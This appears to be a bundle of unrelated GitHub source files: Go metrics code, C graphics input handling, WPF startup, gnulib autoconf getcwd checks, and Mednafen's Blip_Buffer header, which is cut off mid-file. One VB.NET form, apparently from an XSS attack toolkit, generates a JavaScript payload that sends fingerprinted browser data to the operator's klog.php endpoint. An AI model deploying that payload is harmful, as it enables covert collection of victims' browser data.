// meterArbiter ticks all meters every 5s from a single goroutine.
// Meters are referenced in a set so they can be removed when stopped.
type meterArbiter struct {
sync.RWMutex
started bool
meters map[*StandardMeter]struct{}
ticker *time.Ticker
}
// Shared arbiter instance; the ticker fires every 5 seconds (5e9 nanoseconds).
var arbiter = meterArbiter{ticker: time.NewTicker(5e9), meters: make(map[*StandardMeter]struct{})}
// tick ticks meters on the scheduled interval; runs forever in its own goroutine.
func (ma *meterArbiter) tick() {
for {
select {
case <-ma.ticker.C:
ma.tickMeters()
}
}
}
// tickMeters advances every registered meter's EWMAs under the read lock.
func (ma *meterArbiter) tickMeters() {
ma.RLock()
defer ma.RUnlock()
for meter := range ma.meters {
meter.tick()
}
}
| {
"pile_set_name": "Github"
} |
// input.c
#include "../include/simple2d.h"
/*
 * Get the mouse coordinates relative to the viewport.
 *
 * window: the window whose viewport settings define the transform
 * wx, wy: mouse position in window (physical pixel) coordinates
 * x, y:   out-params receiving the position in viewport coordinates
 */
void S2D_GetMouseOnViewport(S2D_Window *window, int wx, int wy, int *x, int *y) {
double scale; // viewport scale factor
int w, h; // width and height of scaled viewport
switch (window->viewport.mode) {
case S2D_FIXED: case S2D_EXPAND:
// Viewport keeps its own resolution: rescale by the window/viewport ratio.
*x = wx / (window->orig_width / (double)window->viewport.width);
*y = wy / (window->orig_height / (double)window->viewport.height);
break;
case S2D_SCALE:
// Aspect-preserving scale: undo the scale, then remove the letterbox offset.
S2D_GL_GetViewportScale(window, &w, &h, &scale);
*x = wx * 1 / scale - (window->width - w) / (2.0 * scale);
*y = wy * 1 / scale - (window->height - h) / (2.0 * scale);
break;
case S2D_STRETCH:
// Non-uniform stretch: scale each axis independently.
*x = wx * window->viewport.width / (double)window->width;
*y = wy * window->viewport.height / (double)window->height;
break;
}
}
/*
 * Show the cursor over the window (thin wrapper around SDL_ShowCursor).
 */
void S2D_ShowCursor() {
SDL_ShowCursor(SDL_ENABLE);
}
/*
 * Hide the cursor over the window (thin wrapper around SDL_ShowCursor).
 */
void S2D_HideCursor() {
SDL_ShowCursor(SDL_DISABLE);
}
| {
"pile_set_name": "Github"
} |
{
"name": "Hipmunk",
"description": "A service for finding hotels and flights.",
"url": "https://www.hipmunk.com/"
} | {
"pile_set_name": "Github"
} |
using System;
using System.Collections.Generic;
using System.Configuration;
using System.Data;
using System.Linq;
using System.Threading.Tasks;
using System.Windows;
using System.Windows.Navigation;
using Microsoft.Practices.Unity;
using ServiceImplementations;
using Controllers;
using ServiceInterfaces;
using ViewModels;
namespace UI
{
/// <summary>
/// WPF application entry point. On startup it configures AutoMapper mappings,
/// composes the object graph with a Unity container, shows the main view, and
/// triggers the controller's initial load.
/// </summary>
public partial class App : Application
{
private void OnApplicationStartup(object sender, StartupEventArgs e)
{
CreateMappings();
container = new UnityContainer();
// Register abstractions against their concrete implementations.
container.RegisterType<ISettings, ApplicationSettings>();
container.RegisterType<IObjectMapper, MapperAutoMapper>();
container.RegisterType<ITaskService, TaskServiceAdo>();
container.RegisterType<TaskListController>();
container.RegisterType<TaskListView>();
// Resolve the view (and, transitively, its controller/DataContext) and show it.
MainWindow = container.Resolve<TaskListView>();
MainWindow.Show();
// Kick off the controller's initial data load after the window is visible.
((TaskListController)MainWindow.DataContext).OnLoad();
}
// Configures the AutoMapper DTO -> ViewModel mappings used by IObjectMapper.
private void CreateMappings()
{
AutoMapper.Mapper.CreateMap<TaskDto, TaskViewModel>();
}
// Composition root container; created in OnApplicationStartup.
private IUnityContainer container;
}
}
| {
"pile_set_name": "Github"
} |
Imports System.IO
' Form that generates a browser-fingerprinting JavaScript payload (xss.js), then
' polls logs.txt for data posted back to the local server and renders it.
' NOTE(review): every handler uses "On Error Resume Next", so all errors
' (file locks, missing files, etc.) are silently swallowed.
Public Class xss_info_browser_detector
' Writes xss.js: wraps the user-supplied script (TextBox1) in a marker-id guard
' so it executes at most once per page, and exfiltrates the result to klog.php.
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
On Error Resume Next
' Random suffix for the marker element id.
' NOTE(review): Str() prefixes non-negative numbers with a space, so the
' generated id contains a space (e.g. "xenotix_brfg 315") - confirm intended.
Dim ran = New Random()
Dim tmp = ran.Next(300, 350)
Dim stream As New IO.StreamWriter(Application.StartupPath & "\xss.js")
stream.WriteLine("if (document.getElementById('xenotix_brfg" & Str(tmp) & "') == null){ ")
stream.WriteLine(TextBox1.Text)
stream.WriteLine("new Image().src = 'http://" & xss_server.server_ip & "/klog.php?log='+ret;")
stream.WriteLine(" script = document.createElement('script');script.id = 'xenotix_brfg" & Str(tmp) & "'; document.body.appendChild(script); }")
stream.Close()
' Disable the button and start polling logs.txt for results.
Button1.Enabled = False
Timer1.Enabled = True
End Sub
' Hides the raw-script textbox and clears any stale results on load.
Private Sub xss_info_browser_fingerprint_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
On Error Resume Next
TextBox1.Visible = False
IO.File.Delete("logs.txt")
End Sub
' Cleans up the generated payload and log file, then closes the form.
Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
On Error Resume Next
IO.File.Delete("xss.js")
IO.File.Delete("logs.txt")
Me.Close()
End Sub
' Polls logs.txt; once non-empty, renders its contents in the browser control
' and stops polling.
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
On Error Resume Next
Dim line As String = ""
Dim readfile As System.IO.TextReader = New StreamReader(Application.StartupPath & "\logs.txt")
line = readfile.ReadToEnd()
If Not line = "" Then
WebBrowser1.ScriptErrorsSuppressed = True
WebBrowser1.DocumentText = line
Timer1.Enabled = False
End If
readfile.Close()
readfile = Nothing
End Sub
End Class | {
"pile_set_name": "Github"
} |
# getcwd.m4 - check for working getcwd that is compatible with glibc
# Copyright (C) 2001, 2003-2007, 2009-2020 Free Software Foundation, Inc.
# This file is free software; the Free Software Foundation
# gives unlimited permission to copy and/or distribute it,
# with or without modifications, as long as this notice is preserved.
# Written by Paul Eggert.
# serial 18
dnl gl_FUNC_GETCWD_NULL
dnl Checks (by running a test program) whether getcwd (NULL, 0) allocates the
dnl result buffer, as glibc does. When cross-compiling, falls back to per-host
dnl guesses; the result is cached in gl_cv_func_getcwd_null.
AC_DEFUN([gl_FUNC_GETCWD_NULL],
[
AC_REQUIRE([AC_CANONICAL_HOST]) dnl for cross-compiles
AC_CHECK_HEADERS_ONCE([unistd.h])
AC_CACHE_CHECK([whether getcwd (NULL, 0) allocates memory for result],
[gl_cv_func_getcwd_null],
[AC_RUN_IFELSE([AC_LANG_PROGRAM([[
# include <stdlib.h>
# if HAVE_UNISTD_H
# include <unistd.h>
# else /* on Windows with MSVC */
# include <direct.h>
# endif
# ifndef getcwd
char *getcwd ();
# endif
]], [[
#if defined _WIN32 && ! defined __CYGWIN__
/* mingw cwd does not start with '/', but getcwd does allocate.
However, mingw fails to honor non-zero size. */
#else
if (chdir ("/") != 0)
return 1;
else
{
char *f = getcwd (NULL, 0);
if (! f)
return 2;
if (f[0] != '/')
{ free (f); return 3; }
if (f[1] != '\0')
{ free (f); return 4; }
free (f);
return 0;
}
#endif
]])],
[gl_cv_func_getcwd_null=yes],
[gl_cv_func_getcwd_null=no],
[[case "$host_os" in
# Guess yes on glibc systems.
*-gnu* | gnu*) gl_cv_func_getcwd_null="guessing yes";;
# Guess yes on musl systems.
*-musl*) gl_cv_func_getcwd_null="guessing yes";;
# Guess yes on Cygwin.
cygwin*) gl_cv_func_getcwd_null="guessing yes";;
# If we don't know, obey --enable-cross-guesses.
*) gl_cv_func_getcwd_null="$gl_cross_guess_normal";;
esac
]])])
])
dnl gl_FUNC_GETCWD_SIGNATURE
dnl Set gl_cv_func_getcwd_posix_signature to yes/no according to whether
dnl the system declares getcwd with the POSIX prototype
dnl char *getcwd (char *, size_t). A compile-only check suffices, so it is
dnl safe when cross-compiling.
AC_DEFUN([gl_FUNC_GETCWD_SIGNATURE],
[
AC_CACHE_CHECK([for getcwd with POSIX signature],
[gl_cv_func_getcwd_posix_signature],
[AC_COMPILE_IFELSE(
[AC_LANG_PROGRAM(
[[#include <unistd.h>]],
[[extern
#ifdef __cplusplus
"C"
#endif
char *getcwd (char *, size_t);
]])
],
[gl_cv_func_getcwd_posix_signature=yes],
[gl_cv_func_getcwd_posix_signature=no])
])
])
dnl Guarantee that getcwd will malloc with a NULL first argument. Assumes
dnl that either the system getcwd is robust, or that calling code is okay
dnl with spurious failures when run from a directory with an absolute name
dnl larger than 4k bytes.
dnl
dnl Assumes that getcwd exists; if you are worried about obsolete
dnl platforms that lacked getcwd(), then you need to use the GPL module.
AC_DEFUN([gl_FUNC_GETCWD_LGPL],
[
AC_REQUIRE([gl_UNISTD_H_DEFAULTS])
AC_REQUIRE([gl_FUNC_GETCWD_NULL])
AC_REQUIRE([gl_FUNC_GETCWD_SIGNATURE])
dnl Keep the system getcwd only if both probes passed: the NULL probe may
dnl report "yes" or "guessing yes" (hence the *yes pattern), while the
dnl signature probe must be exactly "yes". Otherwise request replacement.
case $gl_cv_func_getcwd_null,$gl_cv_func_getcwd_posix_signature in
*yes,yes) ;;
*)
dnl Minimal replacement lib/getcwd-lgpl.c.
REPLACE_GETCWD=1
;;
esac
])
dnl Check for all known getcwd bugs; useful for a program likely to be
dnl executed from an arbitrary location.
dnl gl_FUNC_GETCWD
dnl Full check: in addition to the NULL-allocation and signature probes,
dnl run the PATH_MAX and abort-bug probes, define the HAVE_*_GETCWD
dnl capability macros, and request the full replacement (REPLACE_GETCWD=1)
dnl if any check failed.
AC_DEFUN([gl_FUNC_GETCWD],
[
AC_REQUIRE([gl_UNISTD_H_DEFAULTS])
AC_REQUIRE([gl_FUNC_GETCWD_NULL])
AC_REQUIRE([gl_FUNC_GETCWD_SIGNATURE])
AC_REQUIRE([AC_CANONICAL_HOST]) dnl for cross-compiles
gl_abort_bug=no
dnl On mingw, skip the expensive runtime probes and assume the PATH_MAX
dnl behavior is acceptable; elsewhere, probe PATH_MAX handling and — only
dnl when getcwd (NULL, 0) allocates — probe for the abort bug as well.
case "$host_os" in
mingw*)
gl_cv_func_getcwd_path_max=yes
;;
*)
gl_FUNC_GETCWD_PATH_MAX
case "$gl_cv_func_getcwd_null" in
*yes)
gl_FUNC_GETCWD_ABORT_BUG([gl_abort_bug=yes])
;;
esac
;;
esac
dnl Define HAVE_MINIMALLY_WORKING_GETCWD and HAVE_PARTLY_WORKING_GETCWD
dnl if appropriate.
case "$gl_cv_func_getcwd_path_max" in
*"no" | *"no, it has the AIX bug") ;;
*)
AC_DEFINE([HAVE_MINIMALLY_WORKING_GETCWD], [1],
[Define to 1 if getcwd minimally works, that is, its result can be
trusted when it succeeds.])
;;
esac
case "$gl_cv_func_getcwd_path_max" in
*"no, but it is partly working")
AC_DEFINE([HAVE_PARTLY_WORKING_GETCWD], [1],
[Define to 1 if getcwd works, except it sometimes fails when it
shouldn't, setting errno to ERANGE, ENAMETOOLONG, or ENOENT.])
;;
*"yes, but with shorter paths")
AC_DEFINE([HAVE_GETCWD_SHORTER], [1],
[Define to 1 if getcwd works, but with shorter paths
than is generally tested with the replacement.])
;;
esac
dnl Replace getcwd if any probe failed: NULL allocation not supported,
dnl non-POSIX signature, a PATH_MAX problem, or the abort bug.
if { case "$gl_cv_func_getcwd_null" in *yes) false;; *) true;; esac; } \
|| test $gl_cv_func_getcwd_posix_signature != yes \
|| { case "$gl_cv_func_getcwd_path_max" in *yes*) false;; *) true;; esac; } \
|| test $gl_abort_bug = yes; then
REPLACE_GETCWD=1
fi
])
# Prerequisites of lib/getcwd.c, when full replacement is in effect.
AC_DEFUN([gl_PREREQ_GETCWD],
[
AC_REQUIRE([gl_USE_SYSTEM_EXTENSIONS])
AC_REQUIRE([gl_CHECK_TYPE_STRUCT_DIRENT_D_INO])
dnl ':' is a shell no-op so the macro expansion remains a valid command
dnl even if the AC_REQUIREd macros expand to nothing here.
:
])
| {
"pile_set_name": "Github"
} |
左侧腹股沟 11 15 身体部位
肿物 19 20 症状和体征
| {
"pile_set_name": "Github"
} |
/* BEGIN_COMMON_COPYRIGHT_HEADER
*
* TOra - An Oracle Toolkit for DBA's and developers
*
* Shared/mixed copyright is held throughout files in this product
*
* Portions Copyright (C) 2000-2001 Underscore AB
* Portions Copyright (C) 2003-2005 Quest Software, Inc.
* Portions Copyright (C) 2004-2013 Numerous Other Contributors
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; only version 2 of
* the License is valid for this program.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program as the file COPYING.txt; if not, please see
* http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
*
* As a special exception, you have permission to link this program
* with the Oracle Client libraries and distribute executables, as long
* as you follow the requirements of the GNU GPL in regard to all of the
* software in the executable aside from Oracle client libraries.
*
* All trademarks belong to their respective owners.
*
* END_COMMON_COPYRIGHT_HEADER */
#ifndef TORESULTTABLEVIEWEDIT_H
#define TORESULTTABLEVIEWEDIT_H
#include "core/toqvalue.h"
#include "core/tosql.h"
#include "core/toresult.h"
#include "core/toconnection.h"
#include <QtCore/QObject>
#include <QtCore/QAbstractTableModel>
#include <QTableView>
#include <QtCore/QModelIndex>
#include <QtCore/QList>
#include <QHeaderView>
#include <QMenu>
#include "tools/toresulttableview.h"
class toResultModel;
class toResultModelEdit;
/*! \brief Displays query result as a table and provides functionality to edit it.
Used in Schema browser tool.
*/
class toResultTableViewEdit : public toResultTableView
{
Q_OBJECT;
public:
/**
* Creates a new tableview for editing data.
*
* @param parent qobject parent
* @param name sets objectName property
*/
toResultTableViewEdit(QWidget *parent,
const char *name = 0);
virtual ~toResultTableViewEdit(void);
/**
* Reimplemented to create query and new model.
*/
virtual void query(const QString &sql, toQueryParams const& param);
// Returns the model downcast to the editable variant used by this view.
toResultModelEdit* editModel();
protected slots:
// reimplemented
virtual void slotHandleDoubleClick(const QModelIndex &);
// reimplemented
// Hide all "additional" PriKey columns (starting from 1st column)
virtual void slotApplyColumnRules(void);
private slots:
/**
* Calls Model to add new record.
*/
void addRecord(void);
/**
* Calls Model to duplicate the current record.
*/
void duplicateRecord(void);
/**
* Calls Model to delete current record
*/
void deleteRecord(void);
/**
* Clears Changes
*/
void revertChanges(void);
/**
* Handle signal from model when rows are added
*/
void handleNewRows(const QModelIndex &parent, int start, int end);
protected:
/**
* Reimplemented to handle delete key
*/
virtual void keyPressEvent(QKeyEvent * event);
/*
* Helper function - allocate new instance of model
* toResultTableView uses toResultModel
* while
* toResultTableViewEdit uses toResultModelEdit
*/
virtual toResultModel* allocModel(toEventQuery *query);
// NOTE(review): presumably the schema owner / table name of the edited
// object and its primary-key column names — confirm against the .cpp.
QString Owner, Table;
QList<QString> PriKeys;
};
#endif
| {
"pile_set_name": "Github"
} |
// Band-limited sound synthesis buffer
// Various changes and hacks for use in Mednafen.
#ifdef __GNUC__
#define blip_inline inline __attribute__((always_inline))
#else
#define blip_inline inline
#endif
#include <limits.h>
#include <inttypes.h>
// Blip_Buffer 0.4.1
#ifndef BLIP_BUFFER_H
#define BLIP_BUFFER_H
// Internal
typedef int32_t blip_long;
typedef uint32_t blip_ulong;
typedef int64_t blip_s64;
typedef uint64_t blip_u64;
// Time unit at source clock rate
typedef blip_long blip_time_t;
// Output samples are 16-bit signed, with a range of -32768 to 32767
typedef short blip_sample_t;
enum { blip_sample_max = 32767 };
class Blip_Buffer {
public:
typedef const char* blargg_err_t;
// Set output sample rate and buffer length in milliseconds (1/1000 sec, defaults
// to 1/4 second), then clear buffer. Returns NULL on success, otherwise if there
// isn't enough memory, returns error without affecting current buffer setup.
blargg_err_t set_sample_rate( long samples_per_sec, int msec_length = 1000 / 4 );
// Set number of source time units per second
void clock_rate( long );
// End current time frame of specified duration and make its samples available
// (along with any still-unread samples) for reading with read_samples(). Begins
// a new time frame at the end of the current frame.
void end_frame( blip_time_t time );
// Read at most 'max_samples' out of buffer into 'dest', removing them from from
// the buffer. Returns number of samples actually read and removed. If stereo is
// true, increments 'dest' one extra time after writing each sample, to allow
// easy interleving of two channels into a stereo output buffer.
long read_samples( blip_sample_t* dest, long max_samples, int stereo = 0 );
// Additional optional features
// Current output sample rate
long sample_rate() const;
// Length of buffer, in milliseconds
int length() const;
// Number of source time units per second
long clock_rate() const;
// Set frequency high-pass filter frequency, where higher values reduce bass more
void bass_freq( int frequency );
// Number of samples delay from synthesis to samples read out
int output_latency() const;
// Remove all available samples and clear buffer to silence. If 'entire_buffer' is
// false, just clears out any samples waiting rather than the entire buffer.
void clear( int entire_buffer = 1 );
// Number of samples available for reading with read_samples()
long samples_avail() const;
// Remove 'count' samples from those waiting to be read
void remove_samples( long count );
// Experimental features
// Count number of clocks needed until 'count' samples will be available.
// If buffer can't even hold 'count' samples, returns number of clocks until
// buffer becomes full.
blip_time_t count_clocks( long count ) const;
// Number of raw samples that can be mixed within frame of specified duration.
long count_samples( blip_time_t duration ) const;
// Mix 'count' samples from 'buf' into buffer.
void mix_samples( blip_sample_t const* buf, long count );
// not documented yet
// Dirty flag: set_modified() marks the buffer changed; clear_modified()
// returns the flag and resets it.
void set_modified() { modified_ = 1; }
int clear_modified() { int b = modified_; modified_ = 0; return b; }
typedef blip_u64 blip_resampled_time_t;
void remove_silence( long count );
// Convert a duration / source-clock time to fixed-point resampled time
// (integer sample index in the high bits, sub-sample phase in the low bits).
blip_resampled_time_t resampled_duration( int t ) const { return t * factor_; }
blip_resampled_time_t resampled_time( blip_time_t t ) const { return t * factor_ + offset_; }
blip_resampled_time_t clock_rate_factor( long clock_rate ) const;
public:
Blip_Buffer();
~Blip_Buffer();
// Deprecated
typedef blip_resampled_time_t resampled_time_t;
blargg_err_t sample_rate( long r ) { return set_sample_rate( r ); }
blargg_err_t sample_rate( long r, int msec ) { return set_sample_rate( r, msec ); }
private:
// noncopyable
Blip_Buffer( const Blip_Buffer& );
Blip_Buffer& operator = ( const Blip_Buffer& );
public:
// Implementation details, public so that Blip_Synth and the BLIP_READER_*
// macros can access them directly.
typedef blip_time_t buf_t_;
blip_u64 factor_;               // clock-to-sample conversion factor (fixed point)
blip_resampled_time_t offset_;  // fixed-point time of start of current frame
buf_t_* buffer_;                // sample accumulation buffer
blip_long buffer_size_;         // capacity of buffer_, in samples
blip_long reader_accum_;        // running integrator used when reading samples out
int bass_shift_;                // high-pass shift amount derived from bass_freq()
private:
long sample_rate_;
long clock_rate_;
int bass_freq_;
int length_;
int modified_;
friend class Blip_Reader;
};
#ifdef HAVE_CONFIG_H
#include "config.h"
#endif
#define BLIP_BUFFER_ACCURACY 32
#define BLIP_PHASE_BITS 8
// Number of bits in resample ratio fraction. Higher values give a more accurate ratio
// but reduce maximum buffer size.
//#ifndef BLIP_BUFFER_ACCURACY
// #define BLIP_BUFFER_ACCURACY 16
//#endif
// Number bits in phase offset. Fewer than 6 bits (64 phase offsets) results in
// noticeable broadband noise when synthesizing high frequency square waves.
// Affects size of Blip_Synth objects since they store the waveform directly.
//#ifndef BLIP_PHASE_BITS
// #if BLIP_BUFFER_FAST
// #define BLIP_PHASE_BITS 8
// #else
// #define BLIP_PHASE_BITS 6
// #endif
//#endif
// Internal
typedef blip_u64 blip_resampled_time_t;
int const blip_widest_impulse_ = 16;
int const blip_buffer_extra_ = blip_widest_impulse_ + 2;
int const blip_res = 1 << BLIP_PHASE_BITS;
class blip_eq_t;
// Implementation core shared by Blip_Synth when BLIP_BUFFER_FAST is set:
// linear interpolation only, so treble_eq() is a no-op.
class Blip_Synth_Fast_ {
public:
Blip_Buffer* buf;      // default output buffer
int last_amp;          // last amplitude passed to update()
int delta_factor;      // volume scale applied to amplitude deltas
void volume_unit( double );
Blip_Synth_Fast_();
void treble_eq( blip_eq_t const& ) { }
};
// Implementation core for the band-limited (non-fast) Blip_Synth: keeps a
// table of band-limited impulses ('impulses', blip_res phases x 'width'
// samples each) regenerated by treble_eq().
class Blip_Synth_ {
public:
Blip_Buffer* buf;      // default output buffer
int last_amp;          // last amplitude passed to update()
int delta_factor;      // volume scale applied to amplitude deltas
void volume_unit( double );
Blip_Synth_( short* impulses, int width );
void treble_eq( blip_eq_t const& );
private:
double volume_unit_;
short* const impulses;
int const width;
blip_long kernel_unit;
int impulses_size() const { return blip_res / 2 * width + 1; }
void adjust_impulse();
};
// Quality level. Start with blip_good_quality.
const int blip_med_quality = 8;
const int blip_good_quality = 12;
const int blip_high_quality = 16;
// Range specifies the greatest expected change in amplitude. Calculate it
// by finding the difference between the maximum and minimum expected
// amplitudes (max - min).
template<int quality,int range>
class Blip_Synth {
public:
// Set overall volume of waveform
void volume( double v ) { impl.volume_unit( v * (1.0 / (range < 0 ? -range : range)) ); }
// Configure low-pass filter (see blip_buffer.txt)
void treble_eq( blip_eq_t const& eq ) { impl.treble_eq( eq ); }
// Get/set Blip_Buffer used for output
Blip_Buffer* output() const { return impl.buf; }
void output( Blip_Buffer* b ) { impl.buf = b; impl.last_amp = 0; }
// Update amplitude of waveform at given time. Using this requires a separate
// Blip_Synth for each waveform.
void update( blip_time_t time, int amplitude );
// Low-level interface
// Add an amplitude transition of specified delta, optionally into specified buffer
// rather than the one set with output(). Delta can be positive or negative.
// The actual change in amplitude is delta * (volume / range)
void offset( blip_time_t, int delta, Blip_Buffer* ) const;
void offset( blip_time_t t, int delta ) const { offset( t, delta, impl.buf ); }
// Works directly in terms of fractional output samples. Contact author for more info.
void offset_resampled( blip_resampled_time_t, int delta, Blip_Buffer* ) const;
// Same as offset(), except code is inlined for higher performance
void offset_inline( blip_time_t t, int delta, Blip_Buffer* buf ) const {
offset_resampled( t * buf->factor_ + buf->offset_, delta, buf );
}
void offset_inline( blip_time_t t, int delta ) const {
offset_resampled( t * impl.buf->factor_ + impl.buf->offset_, delta, impl.buf );
}
private:
// Implementation is selected at compile time: the fast core does plain
// linear interpolation; the default core stores the band-limited impulse
// table inline in the object (size depends on 'quality').
#if BLIP_BUFFER_FAST
Blip_Synth_Fast_ impl;
#else
Blip_Synth_ impl;
typedef short imp_t;
imp_t impulses [blip_res * (quality / 2) + 1];
public:
Blip_Synth() : impl( impulses, quality ) { }
#endif
};
// Low-pass equalization parameters
class blip_eq_t {
public:
// Logarithmic rolloff to treble dB at half sampling rate. Negative values reduce
// treble, small positive values (0 to 5.0) increase treble.
blip_eq_t( double treble_db = 0 );
// See blip_buffer.txt
blip_eq_t( double treble, long rolloff_freq, long sample_rate, long cutoff_freq = 0 );
private:
double treble;
long rolloff_freq;
long sample_rate;
long cutoff_freq;
// Fill 'out' with 'count' points of the filter's impulse response;
// used by Blip_Synth_ to build its impulse table.
void generate( float* out, int count ) const;
friend class Blip_Synth_;
};
int const blip_sample_bits = 30;
// Dummy Blip_Buffer to direct sound output to, for easy muting without
// having to stop sound code.
class Silent_Blip_Buffer : public Blip_Buffer {
// Minimal fixed-size backing store: just enough room for impulse overhang.
buf_t_ buf [blip_buffer_extra_ + 1];
public:
// The following cannot be used (an assertion will fail if attempted):
blargg_err_t set_sample_rate( long samples_per_sec, int msec_length );
blip_time_t count_clocks( long count ) const;
void mix_samples( blip_sample_t const* buf, long count );
Silent_Blip_Buffer();
};
#if defined (__GNUC__) || _MSC_VER >= 1100
#define BLIP_RESTRICT __restrict
#else
#define BLIP_RESTRICT
#endif
// Optimized reading from Blip_Buffer, for use in custom sample output
// Begin reading from buffer. Name should be unique to the current block.
#define BLIP_READER_BEGIN( name, blip_buffer ) \
const Blip_Buffer::buf_t_* BLIP_RESTRICT name##_reader_buf = (blip_buffer).buffer_;\
blip_long name##_reader_accum = (blip_buffer).reader_accum_
// Get value to pass to BLIP_READER_NEXT()
#define BLIP_READER_BASS( blip_buffer ) ((blip_buffer).bass_shift_)
// Constant value to use instead of BLIP_READER_BASS(), for slightly more optimal
// code at the cost of having no bass control
int const blip_reader_default_bass = 9;
// Current sample
#define BLIP_READER_READ( name ) (name##_reader_accum >> (blip_sample_bits - 16))
// Current raw sample in full internal resolution
#define BLIP_READER_READ_RAW( name ) (name##_reader_accum)
// Advance to next sample
#define BLIP_READER_NEXT( name, bass ) \
(void) (name##_reader_accum += *name##_reader_buf++ - (name##_reader_accum >> (bass)))
// End reading samples from buffer. The number of samples read must now be removed
// using Blip_Buffer::remove_samples().
#define BLIP_READER_END( name, blip_buffer ) \
(void) ((blip_buffer).reader_accum_ = name##_reader_accum)
// Compatibility with older version
const long blip_unscaled = 65535;
const int blip_low_quality = blip_med_quality;
const int blip_best_quality = blip_high_quality;
// Deprecated; use BLIP_READER macros as follows:
// Blip_Reader r; r.begin( buf ); -> BLIP_READER_BEGIN( r, buf );
// int bass = r.begin( buf ) -> BLIP_READER_BEGIN( r, buf ); int bass = BLIP_READER_BASS( buf );
// r.read() -> BLIP_READER_READ( r )
// r.read_raw() -> BLIP_READER_READ_RAW( r )
// r.next( bass ) -> BLIP_READER_NEXT( r, bass )
// r.next() -> BLIP_READER_NEXT( r, blip_reader_default_bass )
// r.end( buf ) -> BLIP_READER_END( r, buf )
class Blip_Reader {
public:
// Start reading from buffer; returns its bass shift for use with next().
int begin( Blip_Buffer& );
// Current sample, scaled down to 16-bit range.
blip_long read() const { return accum >> (blip_sample_bits - 16); }
// Current sample at full internal resolution.
blip_long read_raw() const { return accum; }
// Advance integrator to next sample; 'bass_shift' controls the high-pass leak.
void next( int bass_shift = 9 ) { accum += *buf++ - (accum >> bass_shift); }
// Stop reading and store the integrator back into the buffer.
void end( Blip_Buffer& b ) { b.reader_accum_ = accum; }
private:
const Blip_Buffer::buf_t_* buf;
blip_long accum;
};
// End of public interface
#include <assert.h>
// Mix one band-limited amplitude transition of 'delta' into 'blip_buf' at
// fixed-point time 'time'. The integer part of 'time' picks the output
// sample; the fractional part ('phase') picks which of the blip_res
// pre-shifted impulses to accumulate.
template<int quality,int range>
blip_inline void Blip_Synth<quality,range>::offset_resampled( blip_resampled_time_t time,
int delta, Blip_Buffer* blip_buf ) const
{
// Fails if time is beyond end of Blip_Buffer, due to a bug in caller code or the
// need for a longer buffer as set by set_sample_rate().
assert( (blip_long) (time >> BLIP_BUFFER_ACCURACY) < blip_buf->buffer_size_ );
// Scale the amplitude change by the synth's volume factor.
delta *= impl.delta_factor;
blip_long* BLIP_RESTRICT buf = blip_buf->buffer_ + (time >> BLIP_BUFFER_ACCURACY);
int phase = (int) (time >> (BLIP_BUFFER_ACCURACY - BLIP_PHASE_BITS) & (blip_res - 1));
#if BLIP_BUFFER_FAST
// Fast path: two-point linear interpolation of the step between buf[0]/buf[1].
blip_long left = buf [0] + delta;
// Kind of crappy, but doing shift after multiply results in overflow.
// Alternate way of delaying multiply by delta_factor results in worse
// sub-sample resolution.
blip_long right = (delta >> BLIP_PHASE_BITS) * phase;
left -= right;
right += buf [1];
buf [0] = left;
buf [1] = right;
#else
// Band-limited path: accumulate the impulse forward (fwd) then mirrored
// in reverse (rev), switching to the phase-complement half of the table
// at the midpoint. Statement order is load-bearing; do not reorder.
int const fwd = (blip_widest_impulse_ - quality) / 2;
int const rev = fwd + quality - 2;
int const mid = quality / 2 - 1;
imp_t const* BLIP_RESTRICT imp = impulses + blip_res - phase;
#if defined (_M_IX86) || defined (_M_IA64) || defined (__i486__) || \
defined (__x86_64__) || defined (__ia64__) || defined (__i386__)
// straight forward implementation resulted in better code on GCC for x86
#define ADD_IMP( out, in ) \
buf [out] += (blip_long) imp [blip_res * (in)] * delta
#define BLIP_FWD( i ) {\
ADD_IMP( fwd + i, i );\
ADD_IMP( fwd + 1 + i, i + 1 );\
}
#define BLIP_REV( r ) {\
ADD_IMP( rev - r, r + 1 );\
ADD_IMP( rev + 1 - r, r );\
}
BLIP_FWD( 0 )
if ( quality > 8 ) BLIP_FWD( 2 )
if ( quality > 12 ) BLIP_FWD( 4 )
{
ADD_IMP( fwd + mid - 1, mid - 1 );
ADD_IMP( fwd + mid , mid );
imp = impulses + phase;
}
if ( quality > 12 ) BLIP_REV( 6 )
if ( quality > 8 ) BLIP_REV( 4 )
BLIP_REV( 2 )
ADD_IMP( rev , 1 );
ADD_IMP( rev + 1, 0 );
#else
// for RISC processors, help compiler by reading ahead of writes
#define BLIP_FWD( i ) {\
blip_long t0 = i0 * delta + buf [fwd + i];\
blip_long t1 = imp [blip_res * (i + 1)] * delta + buf [fwd + 1 + i];\
i0 = imp [blip_res * (i + 2)];\
buf [fwd + i] = t0;\
buf [fwd + 1 + i] = t1;\
}
#define BLIP_REV( r ) {\
blip_long t0 = i0 * delta + buf [rev - r];\
blip_long t1 = imp [blip_res * r] * delta + buf [rev + 1 - r];\
i0 = imp [blip_res * (r - 1)];\
buf [rev - r] = t0;\
buf [rev + 1 - r] = t1;\
}
blip_long i0 = *imp;
BLIP_FWD( 0 )
if ( quality > 8 ) BLIP_FWD( 2 )
if ( quality > 12 ) BLIP_FWD( 4 )
{
blip_long t0 = i0 * delta + buf [fwd + mid - 1];
blip_long t1 = imp [blip_res * mid] * delta + buf [fwd + mid ];
imp = impulses + phase;
i0 = imp [blip_res * mid];
buf [fwd + mid - 1] = t0;
buf [fwd + mid ] = t1;
}
if ( quality > 12 ) BLIP_REV( 6 )
if ( quality > 8 ) BLIP_REV( 4 )
BLIP_REV( 2 )
blip_long t0 = i0 * delta + buf [rev ];
blip_long t1 = *imp * delta + buf [rev + 1];
buf [rev ] = t0;
buf [rev + 1] = t1;
#endif
#endif
}
// The helper macros are local to offset_resampled.
#undef BLIP_FWD
#undef BLIP_REV
// offset(): convert source-clock time to fixed-point resampled time and
